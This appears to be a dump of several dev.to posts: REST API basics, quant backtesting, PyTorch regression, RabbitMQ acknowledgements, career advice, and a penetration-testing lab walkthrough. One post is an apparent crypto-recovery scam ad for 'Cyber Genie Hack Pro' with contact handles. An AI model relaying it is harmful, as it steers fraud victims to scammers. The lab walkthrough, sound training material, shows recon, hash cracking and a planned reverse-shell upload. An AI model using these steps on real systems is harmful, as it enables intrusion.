1,877,286 | Part One: Introduction to REST APIs | REST APIs are perhaps the most widely used backend architecture in the industry and seem to be... | 27,616 | 2024-06-06T01:31:41 | https://dev.to/alfredtester/primera-parte-introduccion-api-rest-4109 | testing, api, apitesting | REST APIs are perhaps the most widely used backend architecture in the industry, and they seem to be timeless. Although the architecture was created to solve one problem, it is used to solve almost any problem 😶.
Since we are (or are becoming) functional testers, the backend is generally unknown territory for us, because we are usually only asked to focus on what the user sees. This reduces the combinations or test scenarios we can execute, since some cases require manipulating data at the database level (and we have no access to it) or manipulating the responses of the endpoints being consumed (since we don't know how the queried information is returned to the frontend).
As I mentioned at the beginning, REST APIs are very widely used, so much so that we can notice their presence in almost every application we use day to day, as well as in the ones we have to test (whether web, mobile, desktop, or IoT). Therefore, knowing and, above all, understanding what APIs are all about makes a big difference when it comes to assuring the quality of a digital product.
After this medium-length introduction, let's get down to business:
**What is a REST API?**
Without getting into technicalities (we will go deeper into them later) and putting it very simply, an API is basically a means that allows you to create, query, update, and/or delete information in the system you are interacting with (internal or external), regardless of the programming language it is built with.
Visualmente una API Rest es:

La imagen anterior, para mi; es la mejor representación visualmente hablando sobre qué es un API. Es aquel (aquello) al que le hacen una solicitud (orden) y luego que esta es preparada (solicitud procesada) se entrega la preparación al comensal (consumidor).
---
To avoid overloading you with information, this first post in the series is just an introduction. In each post we will go deeper until we have everything we need to become experts in API testing!
| alfredtester |
1,878,626 | How to do quantitative trading backtesting | Summary The significance and importance of backtesting is undoubted. When doing... | 0 | 2024-06-06T01:29:20 | https://dev.to/fmzquant/how-to-do-quantitative-trading-backtesting-3oof | trading, backtest, cryptocurrency, fmzquant | ## Summary
The significance and importance of backtesting are beyond doubt. When backtesting, the strategy should be placed in a historical environment that is as realistic and faithful as possible; if some details of that environment are ignored, the whole backtest may be invalid. This article explains how to do proper quantitative trading backtesting.
Backtesting is essentially data playback: historical K-line data is replayed and the strategy's trading rules are executed against it, producing performance statistics such as the Sharpe ratio, maximum drawdown, annualized rate of return, and the equity curve. At present, many software packages can do all of this, such as "MetaTrader", "MultiCharts" and "IB Trader Workstation", which are all very comprehensive; there is also an open-source one called VNPY on GitHub, which can be customized flexibly.
FMZ Quant, as a commercial quantitative trading platform, comes with a high-performance backtest engine that uses a for-loop (polling) backtest framework for faster calculation. It also unifies backtesting and live-trading code, solving the "easy to backtest, hard to trade live" dilemma.
- Step 1
Taking the FMZ Quant “Thermostat” timing strategy as an example, let's open the official website of the FMZ Quant (www.fmz.com). Click dashboard, Strategy, select a strategy, click backtest, and go to the following page:


In the backtest configuration interface, you can customize the settings according to your actual needs, such as the backtest period, K-line cycle, and data type (simulation-level or real-market-level data; simulation-level data backtests faster, while real-market-level data is more accurate). In addition, you can set the commission fee for the backtest and the initial funds of the account.
- Step 2
Click on the "mylanguage core" trading library (this strategy is written in the M language; if you use another programming language, this option may not appear). First, set the trading label. The FMZ Quant M language has two backtest execution modes: the closing price model and the latest price model. The closing price model executes the model after the current K line is completed and trades at the open of the next K line; the latest price model executes the model on every price change and trades immediately once a trading signal is established. As shown below:


"The default open lot" refers to the amount opened or closed per trade during backtesting. "Max trade amount once" is the maximum position size sent to the backtest engine in a single order.
There will always be a deviation between the actual trading price and the planned trading price. This offset generally moves in a direction that is unfavorable to the trader, resulting in additional losses. Therefore, it is necessary to add slippage to simulate the real trading environment.
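A back-of-the-envelope sketch of why slippage matters (plain Python with made-up numbers; FMZ applies its own slippage setting internally, so this is only an illustration of the idea):

```python
# Illustrative slippage model: fills move against the trader by a fixed offset.
def fill_price(intended_price, slippage, side):
    """Buyers pay a bit more, sellers receive a bit less."""
    return intended_price + slippage if side == "buy" else intended_price - slippage

buy_fill = fill_price(100.0, 0.5, "buy")    # 100.5
sell_fill = fill_price(100.0, 0.5, "sell")  # 99.5

# Extra cost of a full round trip compared with ideal (zero-slippage) fills
round_trip_cost = (buy_fill - 100.0) + (100.0 - sell_fill)
print(buy_fill, sell_fill, round_trip_cost)  # 100.5 99.5 1.0
```

Even a small per-fill offset compounds over many trades, which is why a backtest with zero slippage tends to overstate returns.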
- Step 3
Fill in the "futures contract" field with the type of contract you want to backtest. For cryptocurrency, we just need to specify the contract period we want to backtest; in this case we use the weekly contract, so enter "this_week".

The "real-market settings" option is mainly used for live trading; in a backtesting environment, keeping the defaults is fine. If "automatic recovery progress" is set to true, then when the robot stops in live trading, restarting it will automatically restore the previous signal position without recalculating the signal. "The number of order retries" is set to 20 by default: when placing an order fails, it will retry up to 20 times. "Network polling interval (milliseconds)" controls how often the robot executes the strategy code.

- Step 4
The spot trading options are primarily for cryptocurrency trading; when backtesting, keeping the default settings is fine, though you can specify any of these parameters if you want. In addition, for some cryptocurrency exchanges you can also set the leverage size and other related settings.

## Strategy Backtest
Before backtesting, determine your trading strategy. Here we take the "Thermostat" timing strategy as an example. According to the market state, this strategy adopts a trend-following approach in trending markets and an oscillation approach in range-bound markets. The source code is shown below (it can also be downloaded from the Strategy Square page on the FMZ Quant website):
```
// Calculate CMI indicator to distinguish between Oscillating and trend market
CMI:=ABS(C-REF(C,29))/(HHV(H,30)-LLV(L,30))*100;
// Define key prices
KOD:=(H+L+C)/3;
// In the Oscillating market, the closing price is greater than the key price is suitable for selling market, otherwise it is for buying market
BE:=IFELSE(C>KOD,1,0);
SE:=IFELSE(C<=KOD,1,0);
// Define 10-day ATR indicator
TR:=MAX(MAX((HIGH-LOW),ABS(REF(CLOSE,1)-HIGH)),ABS(REF(CLOSE,1)-LOW));
ATR10:=MA(TR,10);
// Define the highest and lowest price 3-day moving average
AVG3HI:=MA(H,3);
AVG3LO:=MA(L,3);
// Calculate the entry price of the Oscillating market
LEP:=IFELSE(C>KOD,O+ATR10*0.5,O+ATR10*0.75);
SEP:=IFELSE(C>KOD,O-ATR10*0.75,O-ATR10*0.5);
LEP1:=MAX(LEP,AVG3LO);
SEP1:=MIN(SEP,AVG3HI);
// Calculate the entry price of the trend market
UPBAND:=MA(C,50)+STD(C,50)*2;
DNBAND:=MA(C,50)-STD(C,50)*2;
// Calculate the quit price of the trend market
MA50:=MA(C,50);
// Oscillating strategy logic
CMI<20&&C>=LEP1,BK;
CMI<20&&C<=SEP1,SK;
CMI<20&&C>=AVG3HI,SP;
CMI<20&&C<=AVG3LO,BP;
// Trend strategy logic
CMI>=20&&C>=UPBAND,BK;
CMI>=20&&C<=DNBAND,SK;
CMI>=20&&C<=MA50,SP;
CMI>=20&&C>=MA50,BP;
AUTOFILTER;
```
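For readers who prefer a general-purpose language, the CMI line at the top of the strategy can be sketched in plain Python. This is an illustration only; the backtest engine evaluates the M-language code itself, and the sample series below are made up.

```python
# CMI over the last n bars, mirroring the M-language line:
#   CMI := ABS(C - REF(C, n-1)) / (HHV(H, n) - LLV(L, n)) * 100
# Low CMI means an oscillating (choppy) market; high CMI means a trending one.
def cmi(closes, highs, lows, n=30):
    c, h, l = closes[-n:], highs[-n:], lows[-n:]
    return abs(c[-1] - c[0]) / (max(h) - min(l)) * 100

# A steadily rising series reads as strongly trending...
trend_c = [float(x) for x in range(1, 31)]
print(round(cmi(trend_c, [x + 0.5 for x in trend_c], [x - 0.5 for x in trend_c]), 1))

# ...while a series that ends where it started reads as pure chop.
osc_c = [10.0, 12.0, 10.0] * 10
print(round(cmi(osc_c, [x + 0.5 for x in osc_c], [x - 0.5 for x in osc_c]), 1))
```

The strategy's threshold of 20 then simply routes each bar to the oscillation rules (CMI below 20) or the trend rules (CMI at or above 20).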
In the simulation backtesting interface, after configuring the backtest settings, click the Start Backtest button, and the results will be displayed after a few seconds. The backtest log shows how many seconds the backtest took, the logs, and the total number of transactions. The account information prints the final results of the backtest: average profit and loss, position profit and loss, margin, commission fees, and estimated returns.

The status bar records the trading variety, position, position price, the latest price, the previous trading signal type, the highest and lowest price of the position, the number of updates, as well as capital and time information. In addition, the floating profit-and-loss tab displays the detailed equity curve of the account along with the commonly used performance indicators: rate of return, annualized rate of return, Sharpe ratio, annualized volatility, and maximum drawdown, which can satisfy the needs of the vast majority of users.
Among them, the most important performance indicator is the Sharpe ratio. It is a comprehensive measure that considers both returns and risk, and it is an important index for evaluating a strategy or fund. In essence, it tells you how much excess return you earn for each unit of risk you bear, so the higher the Sharpe ratio, the better.
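As a rough illustration, here is one common way to compute an annualized Sharpe ratio from periodic returns in plain Python. The zero risk-free rate and 365 periods per year (a crypto market that trades every day) are my simplifying assumptions, and the return series is made up; FMZ's exact formula may differ.

```python
import statistics

# Annualized Sharpe ratio sketch: mean excess return per period divided by
# per-period volatility, scaled by the square root of periods per year.
def sharpe_ratio(returns, periods_per_year=365, risk_free=0.0):
    excess = [r - risk_free / periods_per_year for r in returns]
    mean = statistics.mean(excess)
    vol = statistics.stdev(excess)  # sample standard deviation per period
    return mean / vol * periods_per_year ** 0.5

daily = [0.01, -0.005, 0.008, 0.002, -0.003, 0.006]  # made-up daily returns
print(round(sharpe_ratio(daily), 2))
```

Note that six data points are far too few for a meaningful estimate; in practice you would feed in the full series of periodic returns from the backtest.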
Annualized volatility, put simply, scales the variability observed over a short time frame up to a full year. It is a measure of the risk of the strategy, but it is definitely not the full picture. For example, Strategy A has larger volatility but has been volatile upwards with good profit; Strategy B has small volatility but has barely moved at all. Can we really say that Strategy B is better than Strategy A? Strategy A is shown below:

Finally, in the log information, a detailed record of each trading brokered situation when backtesting, including the specific time of the trading, the exchange information, the open and close position type, backtest engine match orders mechanism, as well as the number of transactions and print out informations.

## After Backtesting
Many times, and in most cases, the results of backtesting will be far from what you expect. After all, a long-term, stable, and profitable strategy is not easy to find, and developing one requires a real understanding of the market.
If your strategy loses money in the backtest, don't be discouraged; this is actually quite normal. Check whether the strategy logic has been misrepresented by the code, whether it uses extreme parameter values, whether it has too many position-opening conditions, and so on. It is also worth re-examining the trading strategy and trading ideas from another angle.
If your strategy backtest results are very good, with a perfect equity curve and a Sharpe ratio higher than 1, please don't get excited too quickly. In most such cases the strategy is relying on future functions (look-ahead bias), price stealing, over-fitting, or running with no slippage added. You can use out-of-sample data and simulated live trading to rule out these issues.
## To sum up
The above is the entire process of backtesting a trading strategy, covered down to the details. Note that historical backtesting is an idealized environment in which all risks are known. Therefore, the backtest period should ideally span a full round of bull and bear markets, and the number of effective trades should be no less than 100, to avoid survivorship bias and similar small-sample problems.
The market is always changing and evolving. A good historical backtest does not mean the future will look the same. The goal is not only for the strategy to cope with the known risks of the backtest environment, but also with unknown future risks. Therefore, it is very necessary to increase the robustness and generality of the strategy.
## After-school exercises
1. Try to copy the strategy in this section and backtest it.
2. Try to improve and optimize the strategy in this section based on your trading experience.
From: https://blog.mathquant.com/2019/05/08/5-2-how-to-do-quantitative-trading-backtesting.html | fmzquant |
1,878,609 | Linear Regression Neural Network with nn.Linear() in PyTorch | import torch from torch import nn import matplotlib.pyplot as plt # Setup device device = "cuda" if... | 0 | 2024-06-06T01:20:11 | https://dev.to/hyperkai/linear-regression-neural-network-with-nnlinear-in-pytorch-h4k | pytorch, linearregression, neuralnetwork, deeplearning | ```python
import torch
from torch import nn
import matplotlib.pyplot as plt

# Setup device
device = "cuda" if torch.cuda.is_available() else "cpu"
# print(device)

# Create data
weight = 0.7
bias = 0.3

X = torch.arange(start=0, end=1, step=0.02, device=device).unsqueeze(dim=1)
y = weight * X + bias
# print(X[:10], len(X))
# print(y[:10], len(y))

l = int(0.8 * len(X))
X_train, y_train, X_test, y_test = X[:l], y[:l], X[l:], y[l:]
# print(len(X_train), len(y_train), len(X_test), len(y_test))

class MyModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.linear_layer = nn.Linear(in_features=1, out_features=1)

    def forward(self, x):
        return self.linear_layer(x)

torch.manual_seed(42)

my_model = MyModel().to(device)
# print(my_model, my_model.state_dict())
# print(next(my_model.parameters()).device)
# print(next(my_model.parameters()))

loss_fn = nn.L1Loss()
# loss_fn = nn.MSELoss()

optimizer = torch.optim.SGD(params=my_model.parameters(), lr=0.01)
# optimizer = torch.optim.Adam(params=my_model.parameters(), lr=0.01)

epochs = 100 # Try 0, 50, 100, 150

epoch_count = []
loss_values = []
test_loss_values = []

for epoch in range(epochs):
    my_model.train()

    # 1. Calculate predictions
    y_pred = my_model(X_train)

    # 2. Calculate loss
    loss = loss_fn(y_pred, y_train)

    # 3. Zero out gradient
    optimizer.zero_grad()

    # 4. Do backpropagation
    loss.backward()

    # 5. Optimize model
    optimizer.step()

    # Test
    my_model.eval()
    with torch.inference_mode():
        test_pred = my_model(X_test)
        test_loss = loss_fn(test_pred, y_test)

    if epoch % 10 == 0:
        epoch_count.append(epoch)
        # Store plain Python floats so plotting works on CPU and GPU alike
        loss_values.append(loss.detach().cpu().item())
        test_loss_values.append(test_loss.cpu().item())
        # print(f"Epoch: {epoch} | Loss: {loss} | Test loss: {test_loss}")

# Visualize
with torch.inference_mode():
    y_pred = my_model(X_test)

def plot_predictions(X_train, y_train, X_test, y_test, predictions=None):
    plt.figure(figsize=[6, 4])
    plt.scatter(X_train, y_train, c='g', s=1, label='Train data')
    plt.scatter(X_test, y_test, c='b', s=3, label='Test data')
    if predictions is not None:
        plt.scatter(X_test, predictions, c='r', s=5, label='Predictions')
    plt.title("Train and test data and predictions")
    plt.legend(prop={'size': 14})

plot_predictions(X_train=X_train.cpu(),
                 y_train=y_train.cpu(),
                 X_test=X_test.cpu(),
                 y_test=y_test.cpu(),
                 predictions=y_pred.cpu())

def plot_loss_curves(epoch_count, loss_values, test_loss_values):
    plt.figure(figsize=[6, 4])
    plt.plot(epoch_count, loss_values, label="Train loss")
    plt.plot(epoch_count, test_loss_values, label="Test loss")
    plt.title("Train and test loss curves")
    plt.ylabel("Loss")
    plt.xlabel("Epochs")
    plt.legend(prop={'size': 14})

plot_loss_curves(epoch_count=epoch_count,
                 loss_values=loss_values,
                 test_loss_values=test_loss_values)
```
# <`L1Loss()` and `SGD()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`MSELoss()` and `SGD()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`L1Loss()` and `Adam()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`MSELoss()` and `Adam()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:
 | hyperkai |
1,878,601 | How to Use RabbitMQ's Ack Efficiently | The Motivation Behind This Article Recently, I took part in a debate at... | 0 | 2024-06-06T01:20:02 | https://dev.to/mrdiniz88/como-utilizar-o-ack-do-rabbitmq-de-forma-eficiente-3i2m | rabbitmq, microservices, go, backend | ## The Motivation Behind This Article
Recently, I took part in a debate at work about how to handle message-read acknowledgement in RabbitMQ.
Some colleagues argued, based on previous experience, that the best approach for this application would be to use auto-ack. They reported that when using manual ack, an unexpected error occurred while processing a message, causing it to return to the queue and be reprocessed several times.
Inspired by that discussion and by this [post](https://share.gago.io/Mvzh) from [Luiz Carlos Faria](https://www.linkedin.com/in/luizcarlosfaria)'s blog, I decided to write about why this behavior probably occurred and what, in my view, is the best way to handle read acknowledgement of these messages, along with proper handling in case of errors.
## Before Getting to the Main Topic, I Need to Explain What RabbitMQ Is and What It Offers Us
RabbitMQ is a powerful message broker that facilitates communication between different parts of a piece of software. RabbitMQ offers several features for handling the publishing and receiving of messages. The main features covered in this article are:
- Queues
- Exchanges
- Acknowledgement
- Dead Letter Exchange
### Queues:
The main purpose of a queue is to avoid executing a resource-intensive task immediately and having to wait for it to finish.
In RabbitMQ's messaging model, the producer never sends a message directly to a queue.
For a message to reach a queue in RabbitMQ, it must pass through a resource called an Exchange. Even when sending a message to a queue without specifying an exchange, as shown in the example below, the message passes through an exchange known as the _default exchange_.
```go
package main

import (
	"encoding/json"

	"github.com/streadway/amqp"
)

type message struct {
	ID string `json:"id"`
}

func main() {
	conn, _ := amqp.Dial("amqp://guest:guest@localhost:5672/")
	defer conn.Close()

	ch, _ := conn.Channel()
	defer ch.Close()

	queue, _ := ch.QueueDeclare(
		"TransactionCompleted",
		true,
		false,
		false,
		false,
		nil,
	)

	message := message{
		ID: "1",
	}
	payload, _ := json.Marshal(message)

	ch.Publish(
		"",
		queue.Name,
		false,
		false,
		amqp.Publishing{
			ContentType: "text/plain",
			Body:        []byte(payload),
		},
	)
}
```
### Exchanges:
Exchanges are a resource whose purpose is to manage and route the messages published to RabbitMQ.
There are a few exchange types available: direct, topic, headers, and fanout. If you want to learn more, this [article](https://www.cloudamqp.com/blog/part4-rabbitmq-for-beginners-exchanges-routing-keys-bindings.html) can help.
#### declare
```go
ch.ExchangeDeclare(
	"Transaction",
	"topic",
	true,
	false,
	false,
	false,
	nil,
)

queue, _ := ch.QueueDeclare(
	"ProcessTransaction",
	true,
	false,
	false,
	false,
	nil,
)

eventName := "out.requested"

ch.QueueBind(
	queue.Name,    // name
	eventName,     // key
	"Transaction", // exchange
	false,         // noWait
	nil,           // args
)
```
#### publish
```go
func (r *RabbitMQAdapter) Publish(eventName string, data any) error {
	payload, err := json.Marshal(data)
	if err != nil {
		return err
	}

	return r.channel.Publish(
		r.exchange, // exchange
		eventName,  // key
		false,      // mandatory
		false,      // immediate
		amqp.Publishing{
			ContentType: "text/plain",
			Body:        []byte(payload),
		}, // msg
	)
}

func main() {
	// ...
	rabbitmq := RabbitMQAdapter{
		connection: conn,
		channel:    ch,
	}

	message := message{
		ID: "1",
	}

	rabbitmq.Publish(eventName, message)
}
```
#### consume
```go
func (r *RabbitMQAdapter) Consume(queueName string, callback func(data any) error) error {
	msgCh, _ := r.channel.Consume(
		queueName,
		"",    // consumer
		true,  // auto-ack
		false, // exclusive
		false, // no-local
		false, // no-wait
		nil,   // args
	)

	for msg := range msgCh {
		callback(msg.Body)
	}

	return nil
}

func main() {
	// ...
	rabbitmq.Consume("ProcessTransaction", func(data any) error {
		// process transaction ...
		return nil
	})
}
```
### Acknowledgement:
When RabbitMQ delivers a message to a consumer, it needs to know when to consider the message successfully delivered. RabbitMQ gives us two ways to handle this: auto-ack and manual ack.
With auto-ack, RabbitMQ discards the message as soon as it is consumed.
With manual ack, we control when to issue the acknowledgement and whether it is positive or negative.
#### manual ack example
```go
func (r *RabbitMQAdapter) Consume(queueName string, callback func(data any) error) error {
	msgCh, _ := r.channel.Consume(
		queueName,
		"",    // consumer
		false, // auto-ack
		false, // exclusive
		false, // no-local
		false, // no-wait
		nil,   // args
	)

	for msg := range msgCh {
		if err := callback(msg.Body); err != nil {
			msg.Nack(
				false, // multiple
				true,  // requeue
			)
		} else {
			msg.Ack(
				false, // multiple
			)
		}
	}

	return nil
}
```
### Dead Letter Exchange:
Messages in a queue can be "dead-lettered", which means they are republished to an exchange when any of the following four events occurs:
- The message is negatively acknowledged by a consumer using basic.reject or basic.nack with requeue set to false.
- The message expires due to per-message TTL (time to live).
- The message is dropped because its queue exceeded a length limit.
- The message is returned to a quorum queue more times than the delivery limit.
## How to Avoid Message Reprocessing
Now that we understand the features RabbitMQ offers, let's look at the likely cause of the behavior mentioned in the debate and how it could have been avoided.
Most likely, the requeue option was enabled when calling the nack or reject method.
```go
msg.Nack(
	false, // multiple
	true,  // requeue
)

// or...

msg.Reject(
	true, // requeue
)
```
With that in mind, to avoid reprocessing the message we could simply set the message's requeue flag to false.
```go
msg.Nack(
	false, // multiple
	false, // requeue
)

// or...

msg.Reject(
	false, // requeue
)
```
This way, the message does not go back to the queue and is discarded, just as happens with auto-ack.
## How to Use Manual Ack Efficiently
By default, when using _Nack_ or _Reject_, the message is lost, but that is not always what we want. For this case, RabbitMQ offers the Dead Letter Exchange. With this feature enabled on a queue, when we reject a message it is forwarded to that exchange, which in turn routes the message to the interested parties.
```go
dlxName := "ProcessingError"

ch.ExchangeDeclare(
	dlxName,  // name
	"fanout", // kind
	true,     // durable
	false,    // autoDelete
	false,    // internal
	false,    // noWait
	nil,      // args
)

dlq, _ := ch.QueueDeclare(
	"NotifyCustomer",
	true,
	false,
	false,
	false,
	nil,
)

ch.QueueBind(dlq.Name, "", dlxName, false, nil)

queue, _ := ch.QueueDeclare(
	"ProcessTransaction",
	true,
	false,
	false,
	false,
	amqp.Table{
		"x-dead-letter-exchange": dlxName,
	},
)
```
## Conclusion
With the features presented above, the problem initially discussed in this article, the improper reprocessing of messages, can be solved.
Manual ack with the _requeue_ option disabled, together with a _Dead Letter Exchange_, forms a powerful combination for handling errors in your application. | mrdiniz88
1,878,600 | RECLAIM BITCOIN/DIGITAL ASSET...RECOVER MONEY BACK... | Imagine the sheer disbelief and joy one would feel upon discovering that a staggering $394,000 worth... | 0 | 2024-06-06T01:15:27 | https://dev.to/keith_snyder_9200fd1cd266/reclaim-bitcoindigital-assetrecover-money-back-2mb0 | webdev, programming, python | Imagine the sheer disbelief and joy one would feel upon discovering that a staggering $394,000 worth of Bitcoin, seemingly vanished into the ether, has reappeared. This is precisely the remarkable scenario that unfolded for me, I found my missing cryptocurrency fortune thanks to the intervention of a digital wizard of sorts, Cyber Genie Hack Pro. In the ever-evolving landscape of blockchain technology and decentralized finance, the loss or theft of digital assets is an all-too-common occurrence, leaving victims grappling with the agonizing prospect of never recovering their hard-earned funds. However, in my case, I refused to accept defeat, and through a combination of persistence, technological savvy, and a stroke of good fortune, they were able to track down and reclaim my missing Bitcoin. The process, no doubt, was arduous and fraught with uncertainty, but the payoff was nothing short of life-changing. Imagine the relief, vindication, and the renewed faith in the system that must have washed over me as I watched my lost treasure reappear, like a rabbit pulled from the magician's hat. This remarkable tale serves as a testament to the resilience of the human spirit, the power of innovative solutions, and the potential for technology to overcome even the most daunting challenges. It is a story that reminds us that in the ever-evolving world of digital assets, the impossible may not be as out of reach as we might think through the aid of Cyber Genie Hack Pro. Talk to a representative of theirs via:
W.E.B/ w.w.w (cybergeniehackpro) . x y z
T.E.L.E.G.R.A.M/ (@)Cybergeniehackpro
W.H.A.T.S.A.P.P LINK/ wa.link/aciuds
Thank you.
 | keith_snyder_9200fd1cd266 |
1,878,483 | What would I say to my past self 2 years ago? | Easy Answer: Buy Crypto. Thank you all, see you next time! Just kidding (or not), but... | 0 | 2024-06-06T01:15:16 | https://dev.to/mateussousa00/what-would-i-say-to-my-past-self-2-years-ago-fm0 | webdev, beginners, productivity, learning | ## Easy Answer:
Buy Crypto.
Thank you all, see you next time!
Just kidding (or not), but let me introduce myself... I'm a Fullstack Developer, I work mainly with JS/TS, but I've ventured into PHP, Java, Kotlin, and Go... all within two years.
I've learned a lot during this time, but the funny thing is, the most valuable lessons I learned were more related to soft skills, communication, and people management. Weird, right?
So, you probably came here imagining that I would share some knowledge about what to learn first, roadmaps, or how to get the first job. These things are valuable, but they are easy to find. That's why I want to introduce you to the first topic of this discussion:
## Learn How to Search
As a beginner, you will probably struggle a lot when searching for things on the internet to help you with the tasks you are facing right now.
You might be wondering, "But this is easy, I just need to use ChatGPT, and my problem is solved." You're partially correct, but if you don't know how to search effectively, you will probably be in trouble soon.
I don't want to be a moralist and say that you shouldn't use it, but if you do, use it correctly. Understand the question, the task, and the logic you need to overcome the situation. Be a good searcher; every good developer is.
Because if you ask the AI for the solution to your problem, it may provide one, but would it be the best solution? Would it be a solution that doesn't put your project at risk of security or performance issues?
Think about it.
This advice isn't valuable only for developers. For example, if you want a job, don't just Google "remote job"; this is too vague. Always focus on your needs. For me, as a Fullstack developer who knows many languages, I'd do searches like:
> "Fullstack developer with Spring Kotlin and Vue.js remote"
> "Backend developer with NestJS and GraphQL remote"
I could do lots of variations of this, but this is way better than "remote job."
## Appear, Lose Your Shyness
Here in Brazil, we have a popular quote that is:
> Quem não é visto, não é lembrado
This means if they don't see you, they will never remember you. Hard, isn't it?
The thing is, you could be one of the best developers in the world, but if no one knows who you are, honestly? It's not valuable.
Talk to other developers, recruiters, POs, PMs. You don't have to be straightforward with "Do you have a job?" Share things that could add value to their lives, like a post you read on LinkedIn or dev.to (from me, of course), or a video about a new trend in IT.
I remember when a friend of mine introduced me to BUN. We discussed it, and it was a nice conversation. I really appreciated it.
Also, remember always: be nice, be gentle.
Create meaningful connections that you desire to bring into your life. New job positions, companies, and networks will always appear (as long as people remember you).
## Learn Wisely
This is tricky, right? Let me be straightforward: what do you want to be? A developer? A PO? Understand the role you want. If you don't know yet, it's time to learn what these roles do in a company or a job.
When you discover what you want to be, create a roadmap based on what makes a good developer, a good Product Owner... Remember that thing I told you earlier? Learn how to search.
This is probably the most valuable advice you'll have today, again: Learn how to search.
For example, if you want to be a good developer, you don't have to learn too many languages at once. Master one first, then discover other languages.
## TL;DR
- Buy crypto (not even kidding);
- Learn how to search and use AI as your copilot;
- Appear, lose shyness, make yourself visible in a good way;
- Learn wisely; a good learner knows which steps to take;
I think this is a good start for a post, right? I'll probably write more focused on one or two topics mentioned here, but that's it for today.
See you soon! | mateussousa00 |
1,867,148 | EXPLOITING ACADEMY MACHINE WITH PRIVILEGE ESCALATION | In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll... | 0 | 2024-06-06T01:11:02 | https://dev.to/babsarena/exploiting-academy-machine-with-priviledge-escalation-4ghe | In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll simulate a scenario where we have low-level access to a system and attempt to gain higher privileges. This process will be conducted ethically on a dedicated training machine to understand attacker methodologies and bolster our system defence knowledge.
After successfully setting up your academy machine, use the following details to login to the machine.
**Username: root**
**Password: tcm**

Now we need to get the IP address of the academy machine, to get that input the command:
```
dhclient
```
after that input the command:
```
ip a
```

From the above image, my IP address for academy is **192.168.59.134**
Now we can ping the machine to confirm that both our academy and kali machine are alive and communicating.
For that we use the command:
```
ping 192.168.59.134 -c2
```
NB- your IP address would be different from mine so make sure to note your IP address and ping it.

The image above shows both machines can communicate as no packets were lost.
Next we run NMAP scan to search for open ports using the command:
```
nmap -p- -A 192.168.59.134
```

From the above scan, three ports are open: 21, 22, and 80.
Also note that I highlighted note.txt on port 21; that's because I'm interested in retrieving that text file, since the scan revealed it to us.
**NB- Moving forward, create an academy directory so you can store all files needed for this lab, so as not to have all files scattered around.**

Port 21 is being used by an ftp server which allows anonymous login, so to login, we input the command:
```
ftp 192.168.59.134
```
NB- remember to change the IP address
After entering the command, input **anonymous** for both username and password.
Once you have successfully logged in, input the command below to get the note.txt file.
```
get note.txt
```

That's all you need to do to get the file. The next thing to do is exit FTP and view the text file; to exit FTP, use the command:
```
exit
```
Once you have successfully exited ftp, now we need to view what is inside the **note.txt** file and for that we use the command:
```
cat note.txt
```

The file shows a message from **jdelta**, telling **Heath** about **Grimme** which contains a text about a student's record.
Here's what each data point likely represents:
StudentRegno: 10201321 (Likely a unique student identification number)
studentPhoto: '' (Empty, indicating no photo uploaded)
password: 'cd73502828457d15655bbd7a63fb0bc8' (This is a hashed password, not the original password for security reasons)
studentName: 'Rum Ham' (Student's name)
pincode: '777777' (Possibly a student identification code)
session: '' (Empty, might be session year or term)
department: '' (Empty)
semester: '' (Empty)
cgpa: '7.60' (Student's CGPA - likely Cumulative Grade Point Average)
creationdate: '2021-05-29 14:36:56' (Date and time the record was created)
updationDate: '' (Empty, might be filled when the record is updated)
Now we have a likely username and password for logging into a website, although we don't yet know which website that is.
The first thing we do is input the machine's IP address into a web browser.
Mine still remains **192.168.59.134**, so that is what I input into my web browser.

That's the page it led me to and there's no space for login details, so there must be a login page attached to that IP address.
To find it, we can use a tool such as **DirBuster or ffuf**.
For this lab I'll make use of ffuf, using the command:
```
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.134/FUZZ
```
The above command will search for web directories associated with that IP address.

It found two web directories which are **academy** and **phpmyadmin**
Now, we go to our web-browser and input:
```
192.168.59.134/academy
```
NB- remember to change the IP address to yours

I have successfully found the login page and from the note.txt file I was given the details to use for the login which are:
**StudentRegno: 10201321
password: cd73502828457d15655bbd7a63fb0bc8**

The login fails because the password we were given is not the actual password; it is a password hash, which means we need to crack the hash to find out what the real password is.
To crack the hash, we need to create a file and save the password hash into the file.
To create the password file we'd use **nano** , so input the command:
```
nano hashes.txt
```
Paste the hash in the terminal

Now press **ctrl x** on your keyboard to save

Now press **Y** on your keyboard to save
The bottom of the screen will change as shown in the image below; press the **enter** key on your keyboard to save the file.

Now the hash has been saved as a file named hashes.txt.
To crack the hash we first need to identify what type of hash it is, and we do that using the command:
```
hash-identifier
```
and now we paste the hash

From the image above, the hash is identified as an MD5 hash.
Knowing that, we press **ctrl c** to quit hash-identifier and input the command:
```
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
```
It will reveal the real password to us.
If you have cracked the password before and couldn't see the password, input the command:
```
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
```

The password would reveal itself.
We can also use another method to crack the hash if we do not want to use hashcat.
To crack the hash, visit "https://crackstation.net/" on your web browser and input the hash in the box provided and click on crack hashes.

The hashed password was revealed to be **student**.
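As a sanity check, we can reproduce the crack ourselves with Python's standard library. Hashing candidate words with MD5 and comparing them against the recovered digest is essentially a tiny dictionary attack; the short candidate list below is made up for illustration, and a wordlist like rockyou.txt plays this role at scale:

```python
import hashlib

# The hash recovered from note.txt
target = "cd73502828457d15655bbd7a63fb0bc8"

# A tiny, made-up candidate list; a real attack iterates over a wordlist file
for candidate in ["password", "123456", "student"]:
    digest = hashlib.md5(candidate.encode()).hexdigest()
    if digest == target:
        print(f"match: {candidate}")
```

The same loop generalizes to reading a wordlist file line by line, which is essentially what hashcat does far faster.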
Now we can login with the details:
**StudentRegno: 10201321
password: student**

**Login successful!**
NB- There's no need to change the password, just click on **"my profile"** on the web page.

We can see from the web-browser that the website is making use of PHP programming language.
We can also see that there's a place to upload image which is empty, the plan now is to see if we can upload something other than an image in there.
What we plan on uploading is a script, specifically a reverse shell, so as to give us a connection back to our machine.
